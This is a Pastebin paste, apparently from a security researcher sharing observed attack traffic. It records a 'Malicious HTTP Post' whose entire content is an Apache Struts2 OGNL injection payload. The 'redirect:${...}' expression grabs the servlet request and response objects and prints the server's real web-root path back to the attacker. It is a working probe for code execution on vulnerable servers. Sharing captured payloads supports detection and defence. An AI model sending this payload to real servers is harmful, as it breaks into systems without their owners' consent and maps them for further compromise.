Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Malicious HTTP Post
- *******
- redirect:${
- #req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
- #resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
- #resp.setCharacterEncoding('UTF-8'),
- #resp.getWriter().print("web"),
- #resp.getWriter().print("path:"),
- #resp.getWriter().print(#req.getSession().getServletContext().getRealPath("/")),
- #resp.getWriter().flush(),
- #resp.getWriter().close()
- }
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment